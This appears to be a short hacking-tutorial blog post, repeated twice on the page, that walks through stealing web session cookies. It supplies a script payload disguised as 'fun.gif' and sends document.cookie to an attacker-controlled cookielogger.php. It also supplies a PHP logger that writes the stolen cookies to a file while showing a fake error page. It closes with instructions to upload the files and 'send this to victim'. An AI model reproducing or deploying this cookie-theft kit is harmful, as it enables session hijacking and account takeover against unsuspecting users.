Step 1 : Open Notepad And Copy It!
Code:
<script>location.href='http://www.yoursite.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT> Save It As fun.gif Step2 : We Make Logger Code: <?php $filename = "logfile.txt"; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { echo "Temporary Server Error,Sorry for the inconvenience."; exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { echo "Temporary Server Error,Sorry for the inconvenience."; exit; } } echo "Temporary Server Error,Sorry for the inconvenience."; fclose($handle); exit; } echo "Temporary Server Error,Sorry for the inconvenience."; exit; ?>
Save It As cookielogger.php
Step3 : Now Open New Notepad And Save Blank Notepad File As Logfile.txt
Step 4 : Upload It To Your Hosting
cookielogger.php > http://www.yoursite.com/cookielogger.php
logfile.txt > http://www.yoursite.com/logfile.txt chmod777
fun.gif > http://www.yoursite.com/fun.gif
Now Send Ths To Victim!
Bubye! :)
HexLegend
Code:
<script>location.href='http://www.yoursite.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT> Save It As fun.gif Step2 : We Make Logger Code: <?php $filename = "logfile.txt"; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { echo "Temporary Server Error,Sorry for the inconvenience."; exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { echo "Temporary Server Error,Sorry for the inconvenience."; exit; } } echo "Temporary Server Error,Sorry for the inconvenience."; fclose($handle); exit; } echo "Temporary Server Error,Sorry for the inconvenience."; exit; ?>
Save It As cookielogger.php
Step3 : Now Open New Notepad And Save Blank Notepad File As Logfile.txt
Step 4 : Upload It To Your Hosting
cookielogger.php > http://www.yoursite.com/cookielogger.php
logfile.txt > http://www.yoursite.com/logfile.txt chmod777
fun.gif > http://www.yoursite.com/fun.gif
Now Send Ths To Victim!
Bubye! :)
HexLegend
0 comments:
Post a Comment